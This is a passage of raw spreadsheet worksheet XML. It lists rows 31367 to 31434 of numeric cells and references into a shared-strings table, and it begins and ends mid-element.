        <v>1.9756104E7</v>
      </c>
      <c r="C31367" s="2" t="s">
        <v>30164</v>
      </c>
      <c r="D31367" s="2">
        <v>1.0</v>
      </c>
      <c r="E31367" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31367" s="2">
        <v>0.1083333333333333</v>
      </c>
    </row>
    <row r="31368" ht="15.75" customHeight="1">
      <c r="A31368" s="1">
        <v>30666.0</v>
      </c>
      <c r="B31368" s="2">
        <v>4.2153344E7</v>
      </c>
      <c r="C31368" s="2" t="s">
        <v>30165</v>
      </c>
      <c r="D31368" s="2">
        <v>1.0</v>
      </c>
      <c r="E31368" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31368" s="2">
        <v>0.1083333333333333</v>
      </c>
    </row>
    <row r="31369" ht="15.75" customHeight="1">
      <c r="A31369" s="1">
        <v>27242.0</v>
      </c>
      <c r="B31369" s="2">
        <v>2.1049992E7</v>
      </c>
      <c r="C31369" s="2" t="s">
        <v>30166</v>
      </c>
      <c r="D31369" s="2">
        <v>1.0</v>
      </c>
      <c r="E31369" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31369" s="2">
        <v>0.108286252354049</v>
      </c>
    </row>
    <row r="31370" ht="15.75" customHeight="1">
      <c r="A31370" s="1">
        <v>30523.0</v>
      </c>
      <c r="B31370" s="2">
        <v>4.0215424E7</v>
      </c>
      <c r="C31370" s="2" t="s">
        <v>30167</v>
      </c>
      <c r="D31370" s="2">
        <v>1.0</v>
      </c>
      <c r="E31370" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31370" s="2">
        <v>0.108286252354049</v>
      </c>
    </row>
    <row r="31371" ht="15.75" customHeight="1">
      <c r="A31371" s="1">
        <v>31837.0</v>
      </c>
      <c r="B31371" s="2">
        <v>5265611.0</v>
      </c>
      <c r="C31371" s="2" t="s">
        <v>30168</v>
      </c>
      <c r="D31371" s="2">
        <v>1.0</v>
      </c>
      <c r="E31371" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31371" s="2">
        <v>0.108286252354049</v>
      </c>
    </row>
    <row r="31372" ht="15.75" customHeight="1">
      <c r="A31372" s="1">
        <v>7584.0</v>
      </c>
      <c r="B31372" s="2">
        <v>5.1593591E7</v>
      </c>
      <c r="C31372" s="2" t="s">
        <v>30169</v>
      </c>
      <c r="D31372" s="2">
        <v>1.0</v>
      </c>
      <c r="E31372" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31372" s="2">
        <v>0.1082862523540489</v>
      </c>
    </row>
    <row r="31373" ht="15.75" customHeight="1">
      <c r="A31373" s="1">
        <v>4458.0</v>
      </c>
      <c r="B31373" s="2">
        <v>4.2427998E7</v>
      </c>
      <c r="C31373" s="2" t="s">
        <v>30170</v>
      </c>
      <c r="D31373" s="2">
        <v>1.0</v>
      </c>
      <c r="E31373" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31373" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="31374" ht="15.75" customHeight="1">
      <c r="A31374" s="1">
        <v>6593.0</v>
      </c>
      <c r="B31374" s="2">
        <v>4.8978375E7</v>
      </c>
      <c r="C31374" s="2" t="s">
        <v>30171</v>
      </c>
      <c r="D31374" s="2">
        <v>1.0</v>
      </c>
      <c r="E31374" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31374" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="31375" ht="15.75" customHeight="1">
      <c r="A31375" s="1">
        <v>6816.0</v>
      </c>
      <c r="B31375" s="2">
        <v>4.9540298E7</v>
      </c>
      <c r="C31375" s="2" t="s">
        <v>30172</v>
      </c>
      <c r="D31375" s="2">
        <v>1.0</v>
      </c>
      <c r="E31375" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31375" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="31376" ht="15.75" customHeight="1">
      <c r="A31376" s="1">
        <v>11848.0</v>
      </c>
      <c r="B31376" s="2">
        <v>2.4746282E7</v>
      </c>
      <c r="C31376" s="2" t="s">
        <v>30173</v>
      </c>
      <c r="D31376" s="2">
        <v>1.0</v>
      </c>
      <c r="E31376" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31376" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="31377" ht="15.75" customHeight="1">
      <c r="A31377" s="1">
        <v>16739.0</v>
      </c>
      <c r="B31377" s="2">
        <v>4.7541482E7</v>
      </c>
      <c r="C31377" s="2" t="s">
        <v>30174</v>
      </c>
      <c r="D31377" s="2">
        <v>1.0</v>
      </c>
      <c r="E31377" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31377" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="31378" ht="15.75" customHeight="1">
      <c r="A31378" s="1">
        <v>20661.0</v>
      </c>
      <c r="B31378" s="2">
        <v>1.4319192E7</v>
      </c>
      <c r="C31378" s="2" t="s">
        <v>9468</v>
      </c>
      <c r="D31378" s="2">
        <v>1.0</v>
      </c>
      <c r="E31378" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31378" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="31379" ht="15.75" customHeight="1">
      <c r="A31379" s="1">
        <v>30463.0</v>
      </c>
      <c r="B31379" s="2">
        <v>3.9492736E7</v>
      </c>
      <c r="C31379" s="2" t="s">
        <v>30175</v>
      </c>
      <c r="D31379" s="2">
        <v>1.0</v>
      </c>
      <c r="E31379" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31379" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="31380" ht="15.75" customHeight="1">
      <c r="A31380" s="1">
        <v>33135.0</v>
      </c>
      <c r="B31380" s="2">
        <v>7065764.0</v>
      </c>
      <c r="C31380" s="2" t="s">
        <v>30176</v>
      </c>
      <c r="D31380" s="2">
        <v>1.0</v>
      </c>
      <c r="E31380" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31380" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="31381" ht="15.75" customHeight="1">
      <c r="A31381" s="1">
        <v>61.0</v>
      </c>
      <c r="B31381" s="2">
        <v>1.1138017E7</v>
      </c>
      <c r="C31381" s="2" t="s">
        <v>30177</v>
      </c>
      <c r="D31381" s="2">
        <v>1.0</v>
      </c>
      <c r="E31381" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31381" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31382" ht="15.75" customHeight="1">
      <c r="A31382" s="1">
        <v>773.0</v>
      </c>
      <c r="B31382" s="2">
        <v>2.1072114E7</v>
      </c>
      <c r="C31382" s="2" t="s">
        <v>30178</v>
      </c>
      <c r="D31382" s="2">
        <v>1.0</v>
      </c>
      <c r="E31382" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31382" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31383" ht="15.75" customHeight="1">
      <c r="A31383" s="1">
        <v>816.0</v>
      </c>
      <c r="B31383" s="2">
        <v>2.1405368E7</v>
      </c>
      <c r="C31383" s="2" t="s">
        <v>30179</v>
      </c>
      <c r="D31383" s="2">
        <v>1.0</v>
      </c>
      <c r="E31383" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31383" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31384" ht="15.75" customHeight="1">
      <c r="A31384" s="1">
        <v>818.0</v>
      </c>
      <c r="B31384" s="2">
        <v>2.1405368E7</v>
      </c>
      <c r="C31384" s="2" t="s">
        <v>30180</v>
      </c>
      <c r="D31384" s="2">
        <v>1.0</v>
      </c>
      <c r="E31384" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31384" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31385" ht="15.75" customHeight="1">
      <c r="A31385" s="1">
        <v>1283.0</v>
      </c>
      <c r="B31385" s="2">
        <v>2.5553357E7</v>
      </c>
      <c r="C31385" s="2" t="s">
        <v>30181</v>
      </c>
      <c r="D31385" s="2">
        <v>1.0</v>
      </c>
      <c r="E31385" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31385" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31386" ht="15.75" customHeight="1">
      <c r="A31386" s="1">
        <v>1456.0</v>
      </c>
      <c r="B31386" s="2">
        <v>2.6867582E7</v>
      </c>
      <c r="C31386" s="2" t="s">
        <v>30182</v>
      </c>
      <c r="D31386" s="2">
        <v>1.0</v>
      </c>
      <c r="E31386" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31386" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31387" ht="15.75" customHeight="1">
      <c r="A31387" s="1">
        <v>1605.0</v>
      </c>
      <c r="B31387" s="2">
        <v>2.7815067E7</v>
      </c>
      <c r="C31387" s="2" t="s">
        <v>30183</v>
      </c>
      <c r="D31387" s="2">
        <v>1.0</v>
      </c>
      <c r="E31387" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31387" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31388" ht="15.75" customHeight="1">
      <c r="A31388" s="1">
        <v>1880.0</v>
      </c>
      <c r="B31388" s="2">
        <v>2.9694713E7</v>
      </c>
      <c r="C31388" s="2" t="s">
        <v>30184</v>
      </c>
      <c r="D31388" s="2">
        <v>1.0</v>
      </c>
      <c r="E31388" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31388" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31389" ht="15.75" customHeight="1">
      <c r="A31389" s="1">
        <v>2140.0</v>
      </c>
      <c r="B31389" s="2">
        <v>3.1607892E7</v>
      </c>
      <c r="C31389" s="2" t="s">
        <v>30185</v>
      </c>
      <c r="D31389" s="2">
        <v>1.0</v>
      </c>
      <c r="E31389" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31389" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31390" ht="15.75" customHeight="1">
      <c r="A31390" s="1">
        <v>2147.0</v>
      </c>
      <c r="B31390" s="2">
        <v>3.1626044E7</v>
      </c>
      <c r="C31390" s="2" t="s">
        <v>30186</v>
      </c>
      <c r="D31390" s="2">
        <v>1.0</v>
      </c>
      <c r="E31390" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31390" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31391" ht="15.75" customHeight="1">
      <c r="A31391" s="1">
        <v>2359.0</v>
      </c>
      <c r="B31391" s="2">
        <v>3.318311E7</v>
      </c>
      <c r="C31391" s="2" t="s">
        <v>30187</v>
      </c>
      <c r="D31391" s="2">
        <v>1.0</v>
      </c>
      <c r="E31391" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31391" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31392" ht="15.75" customHeight="1">
      <c r="A31392" s="1">
        <v>2375.0</v>
      </c>
      <c r="B31392" s="2">
        <v>3.3246166E7</v>
      </c>
      <c r="C31392" s="2" t="s">
        <v>30188</v>
      </c>
      <c r="D31392" s="2">
        <v>1.0</v>
      </c>
      <c r="E31392" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31392" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31393" ht="15.75" customHeight="1">
      <c r="A31393" s="1">
        <v>2400.0</v>
      </c>
      <c r="B31393" s="2">
        <v>3.3396681E7</v>
      </c>
      <c r="C31393" s="2" t="s">
        <v>30189</v>
      </c>
      <c r="D31393" s="2">
        <v>1.0</v>
      </c>
      <c r="E31393" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31393" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31394" ht="15.75" customHeight="1">
      <c r="A31394" s="1">
        <v>2417.0</v>
      </c>
      <c r="B31394" s="2">
        <v>3.3524258E7</v>
      </c>
      <c r="C31394" s="2" t="s">
        <v>30190</v>
      </c>
      <c r="D31394" s="2">
        <v>1.0</v>
      </c>
      <c r="E31394" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31394" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31395" ht="15.75" customHeight="1">
      <c r="A31395" s="1">
        <v>2421.0</v>
      </c>
      <c r="B31395" s="2">
        <v>3.3571982E7</v>
      </c>
      <c r="C31395" s="2" t="s">
        <v>30191</v>
      </c>
      <c r="D31395" s="2">
        <v>1.0</v>
      </c>
      <c r="E31395" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31395" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31396" ht="15.75" customHeight="1">
      <c r="A31396" s="1">
        <v>2472.0</v>
      </c>
      <c r="B31396" s="2">
        <v>3.3834547E7</v>
      </c>
      <c r="C31396" s="2" t="s">
        <v>30192</v>
      </c>
      <c r="D31396" s="2">
        <v>1.0</v>
      </c>
      <c r="E31396" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31396" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31397" ht="15.75" customHeight="1">
      <c r="A31397" s="1">
        <v>2619.0</v>
      </c>
      <c r="B31397" s="2">
        <v>3.447543E7</v>
      </c>
      <c r="C31397" s="2" t="s">
        <v>30193</v>
      </c>
      <c r="D31397" s="2">
        <v>1.0</v>
      </c>
      <c r="E31397" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31397" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31398" ht="15.75" customHeight="1">
      <c r="A31398" s="1">
        <v>3296.0</v>
      </c>
      <c r="B31398" s="2">
        <v>3.7530081E7</v>
      </c>
      <c r="C31398" s="2" t="s">
        <v>30194</v>
      </c>
      <c r="D31398" s="2">
        <v>1.0</v>
      </c>
      <c r="E31398" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31398" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31399" ht="15.75" customHeight="1">
      <c r="A31399" s="1">
        <v>3397.0</v>
      </c>
      <c r="B31399" s="2">
        <v>3.8027085E7</v>
      </c>
      <c r="C31399" s="2" t="s">
        <v>30195</v>
      </c>
      <c r="D31399" s="2">
        <v>1.0</v>
      </c>
      <c r="E31399" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31399" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31400" ht="15.75" customHeight="1">
      <c r="A31400" s="1">
        <v>3504.0</v>
      </c>
      <c r="B31400" s="2">
        <v>3.8539737E7</v>
      </c>
      <c r="C31400" s="2" t="s">
        <v>30196</v>
      </c>
      <c r="D31400" s="2">
        <v>1.0</v>
      </c>
      <c r="E31400" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31400" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31401" ht="15.75" customHeight="1">
      <c r="A31401" s="1">
        <v>3740.0</v>
      </c>
      <c r="B31401" s="2">
        <v>3.968841E7</v>
      </c>
      <c r="C31401" s="2" t="s">
        <v>30197</v>
      </c>
      <c r="D31401" s="2">
        <v>1.0</v>
      </c>
      <c r="E31401" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31401" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31402" ht="15.75" customHeight="1">
      <c r="A31402" s="1">
        <v>4434.0</v>
      </c>
      <c r="B31402" s="2">
        <v>4.2351597E7</v>
      </c>
      <c r="C31402" s="2" t="s">
        <v>30198</v>
      </c>
      <c r="D31402" s="2">
        <v>1.0</v>
      </c>
      <c r="E31402" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31402" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31403" ht="15.75" customHeight="1">
      <c r="A31403" s="1">
        <v>4825.0</v>
      </c>
      <c r="B31403" s="2">
        <v>4.3635005E7</v>
      </c>
      <c r="C31403" s="2" t="s">
        <v>30199</v>
      </c>
      <c r="D31403" s="2">
        <v>1.0</v>
      </c>
      <c r="E31403" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31403" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31404" ht="15.75" customHeight="1">
      <c r="A31404" s="1">
        <v>5597.0</v>
      </c>
      <c r="B31404" s="2">
        <v>4.6136334E7</v>
      </c>
      <c r="C31404" s="2" t="s">
        <v>30200</v>
      </c>
      <c r="D31404" s="2">
        <v>1.0</v>
      </c>
      <c r="E31404" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31404" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31405" ht="15.75" customHeight="1">
      <c r="A31405" s="1">
        <v>6299.0</v>
      </c>
      <c r="B31405" s="2">
        <v>4.8219258E7</v>
      </c>
      <c r="C31405" s="2" t="s">
        <v>30201</v>
      </c>
      <c r="D31405" s="2">
        <v>1.0</v>
      </c>
      <c r="E31405" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31405" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31406" ht="15.75" customHeight="1">
      <c r="A31406" s="1">
        <v>6356.0</v>
      </c>
      <c r="B31406" s="2">
        <v>4.8321522E7</v>
      </c>
      <c r="C31406" s="2" t="s">
        <v>30202</v>
      </c>
      <c r="D31406" s="2">
        <v>1.0</v>
      </c>
      <c r="E31406" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31406" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31407" ht="15.75" customHeight="1">
      <c r="A31407" s="1">
        <v>7737.0</v>
      </c>
      <c r="B31407" s="2">
        <v>5.204867E7</v>
      </c>
      <c r="C31407" s="2" t="s">
        <v>30203</v>
      </c>
      <c r="D31407" s="2">
        <v>1.0</v>
      </c>
      <c r="E31407" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31407" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31408" ht="15.75" customHeight="1">
      <c r="A31408" s="1">
        <v>7822.0</v>
      </c>
      <c r="B31408" s="2">
        <v>5.2284541E7</v>
      </c>
      <c r="C31408" s="2" t="s">
        <v>30204</v>
      </c>
      <c r="D31408" s="2">
        <v>1.0</v>
      </c>
      <c r="E31408" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31408" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31409" ht="15.75" customHeight="1">
      <c r="A31409" s="1">
        <v>8216.0</v>
      </c>
      <c r="B31409" s="2">
        <v>5.3326937E7</v>
      </c>
      <c r="C31409" s="2" t="s">
        <v>30205</v>
      </c>
      <c r="D31409" s="2">
        <v>1.0</v>
      </c>
      <c r="E31409" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31409" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31410" ht="15.75" customHeight="1">
      <c r="A31410" s="1">
        <v>8489.0</v>
      </c>
      <c r="B31410" s="2">
        <v>5.404336E7</v>
      </c>
      <c r="C31410" s="2" t="s">
        <v>30206</v>
      </c>
      <c r="D31410" s="2">
        <v>1.0</v>
      </c>
      <c r="E31410" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31410" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31411" ht="15.75" customHeight="1">
      <c r="A31411" s="1">
        <v>8897.0</v>
      </c>
      <c r="B31411" s="2">
        <v>5.4794797E7</v>
      </c>
      <c r="C31411" s="2" t="s">
        <v>30207</v>
      </c>
      <c r="D31411" s="2">
        <v>1.0</v>
      </c>
      <c r="E31411" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31411" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31412" ht="15.75" customHeight="1">
      <c r="A31412" s="1">
        <v>8947.0</v>
      </c>
      <c r="B31412" s="2">
        <v>5.4908178E7</v>
      </c>
      <c r="C31412" s="2" t="s">
        <v>30208</v>
      </c>
      <c r="D31412" s="2">
        <v>1.0</v>
      </c>
      <c r="E31412" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31412" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31413" ht="15.75" customHeight="1">
      <c r="A31413" s="1">
        <v>9028.0</v>
      </c>
      <c r="B31413" s="2">
        <v>5.5023416E7</v>
      </c>
      <c r="C31413" s="2" t="s">
        <v>30209</v>
      </c>
      <c r="D31413" s="2">
        <v>1.0</v>
      </c>
      <c r="E31413" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31413" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31414" ht="15.75" customHeight="1">
      <c r="A31414" s="1">
        <v>9517.0</v>
      </c>
      <c r="B31414" s="2">
        <v>5.597124E7</v>
      </c>
      <c r="C31414" s="2" t="s">
        <v>30210</v>
      </c>
      <c r="D31414" s="2">
        <v>1.0</v>
      </c>
      <c r="E31414" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31414" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31415" ht="15.75" customHeight="1">
      <c r="A31415" s="1">
        <v>9693.0</v>
      </c>
      <c r="B31415" s="2">
        <v>5.6352137E7</v>
      </c>
      <c r="C31415" s="2" t="s">
        <v>30211</v>
      </c>
      <c r="D31415" s="2">
        <v>1.0</v>
      </c>
      <c r="E31415" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31415" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31416" ht="15.75" customHeight="1">
      <c r="A31416" s="1">
        <v>9835.0</v>
      </c>
      <c r="B31416" s="2">
        <v>5.6644986E7</v>
      </c>
      <c r="C31416" s="2" t="s">
        <v>30212</v>
      </c>
      <c r="D31416" s="2">
        <v>1.0</v>
      </c>
      <c r="E31416" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31416" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31417" ht="15.75" customHeight="1">
      <c r="A31417" s="1">
        <v>10413.0</v>
      </c>
      <c r="B31417" s="2">
        <v>9915179.0</v>
      </c>
      <c r="C31417" s="2" t="s">
        <v>30213</v>
      </c>
      <c r="D31417" s="2">
        <v>1.0</v>
      </c>
      <c r="E31417" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31417" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31418" ht="15.75" customHeight="1">
      <c r="A31418" s="1">
        <v>10894.0</v>
      </c>
      <c r="B31418" s="2">
        <v>1.6574691E7</v>
      </c>
      <c r="C31418" s="2" t="s">
        <v>30214</v>
      </c>
      <c r="D31418" s="2">
        <v>1.0</v>
      </c>
      <c r="E31418" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31418" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31419" ht="15.75" customHeight="1">
      <c r="A31419" s="1">
        <v>11127.0</v>
      </c>
      <c r="B31419" s="2">
        <v>1.9074304E7</v>
      </c>
      <c r="C31419" s="2" t="s">
        <v>30215</v>
      </c>
      <c r="D31419" s="2">
        <v>1.0</v>
      </c>
      <c r="E31419" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31419" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31420" ht="15.75" customHeight="1">
      <c r="A31420" s="1">
        <v>11132.0</v>
      </c>
      <c r="B31420" s="2">
        <v>1.9128918E7</v>
      </c>
      <c r="C31420" s="2" t="s">
        <v>30216</v>
      </c>
      <c r="D31420" s="2">
        <v>1.0</v>
      </c>
      <c r="E31420" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31420" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31421" ht="15.75" customHeight="1">
      <c r="A31421" s="1">
        <v>11346.0</v>
      </c>
      <c r="B31421" s="2">
        <v>2.1228557E7</v>
      </c>
      <c r="C31421" s="2" t="s">
        <v>30217</v>
      </c>
      <c r="D31421" s="2">
        <v>1.0</v>
      </c>
      <c r="E31421" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31421" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31422" ht="15.75" customHeight="1">
      <c r="A31422" s="1">
        <v>11780.0</v>
      </c>
      <c r="B31422" s="2">
        <v>2.4294375E7</v>
      </c>
      <c r="C31422" s="2" t="s">
        <v>30218</v>
      </c>
      <c r="D31422" s="2">
        <v>1.0</v>
      </c>
      <c r="E31422" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31422" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31423" ht="15.75" customHeight="1">
      <c r="A31423" s="1">
        <v>11928.0</v>
      </c>
      <c r="B31423" s="2">
        <v>2.5414732E7</v>
      </c>
      <c r="C31423" s="2" t="s">
        <v>30219</v>
      </c>
      <c r="D31423" s="2">
        <v>1.0</v>
      </c>
      <c r="E31423" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31423" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31424" ht="15.75" customHeight="1">
      <c r="A31424" s="1">
        <v>12241.0</v>
      </c>
      <c r="B31424" s="2">
        <v>2.7885802E7</v>
      </c>
      <c r="C31424" s="2" t="s">
        <v>30220</v>
      </c>
      <c r="D31424" s="2">
        <v>1.0</v>
      </c>
      <c r="E31424" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31424" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31425" ht="15.75" customHeight="1">
      <c r="A31425" s="1">
        <v>12265.0</v>
      </c>
      <c r="B31425" s="2">
        <v>2.8038087E7</v>
      </c>
      <c r="C31425" s="2" t="s">
        <v>30221</v>
      </c>
      <c r="D31425" s="2">
        <v>1.0</v>
      </c>
      <c r="E31425" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31425" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31426" ht="15.75" customHeight="1">
      <c r="A31426" s="1">
        <v>12352.0</v>
      </c>
      <c r="B31426" s="2">
        <v>2.8677093E7</v>
      </c>
      <c r="C31426" s="2" t="s">
        <v>30222</v>
      </c>
      <c r="D31426" s="2">
        <v>1.0</v>
      </c>
      <c r="E31426" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31426" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31427" ht="15.75" customHeight="1">
      <c r="A31427" s="1">
        <v>12372.0</v>
      </c>
      <c r="B31427" s="2">
        <v>2.8820257E7</v>
      </c>
      <c r="C31427" s="2" t="s">
        <v>30223</v>
      </c>
      <c r="D31427" s="2">
        <v>1.0</v>
      </c>
      <c r="E31427" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31427" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31428" ht="15.75" customHeight="1">
      <c r="A31428" s="1">
        <v>12755.0</v>
      </c>
      <c r="B31428" s="2">
        <v>3.1127449E7</v>
      </c>
      <c r="C31428" s="2" t="s">
        <v>30224</v>
      </c>
      <c r="D31428" s="2">
        <v>1.0</v>
      </c>
      <c r="E31428" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31428" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31429" ht="15.75" customHeight="1">
      <c r="A31429" s="1">
        <v>13024.0</v>
      </c>
      <c r="B31429" s="2">
        <v>3.2939364E7</v>
      </c>
      <c r="C31429" s="2" t="s">
        <v>30225</v>
      </c>
      <c r="D31429" s="2">
        <v>1.0</v>
      </c>
      <c r="E31429" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31429" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31430" ht="15.75" customHeight="1">
      <c r="A31430" s="1">
        <v>13188.0</v>
      </c>
      <c r="B31430" s="2">
        <v>3.4080355E7</v>
      </c>
      <c r="C31430" s="2" t="s">
        <v>30226</v>
      </c>
      <c r="D31430" s="2">
        <v>1.0</v>
      </c>
      <c r="E31430" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31430" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31431" ht="15.75" customHeight="1">
      <c r="A31431" s="1">
        <v>13316.0</v>
      </c>
      <c r="B31431" s="2">
        <v>3.4570571E7</v>
      </c>
      <c r="C31431" s="2" t="s">
        <v>30227</v>
      </c>
      <c r="D31431" s="2">
        <v>1.0</v>
      </c>
      <c r="E31431" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31431" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31432" ht="15.75" customHeight="1">
      <c r="A31432" s="1">
        <v>13474.0</v>
      </c>
      <c r="B31432" s="2">
        <v>3.5303013E7</v>
      </c>
      <c r="C31432" s="2" t="s">
        <v>30228</v>
      </c>
      <c r="D31432" s="2">
        <v>1.0</v>
      </c>
      <c r="E31432" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31432" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31433" ht="15.75" customHeight="1">
      <c r="A31433" s="1">
        <v>13495.0</v>
      </c>
      <c r="B31433" s="2">
        <v>3.5413634E7</v>
      </c>
      <c r="C31433" s="2" t="s">
        <v>30229</v>
      </c>
      <c r="D31433" s="2">
        <v>1.0</v>
      </c>
      <c r="E31433" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31433" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31434" ht="15.75" customHeight="1">
      <c r="A31434" s="1">
        <v>13710.0</v>
      </c>
      <c r="B31434" s="2">
        <v>3.6226637E7</v>
      </c>
      <c r="C31434" s="2" t="s">
        <v>30230</v>
      </c>
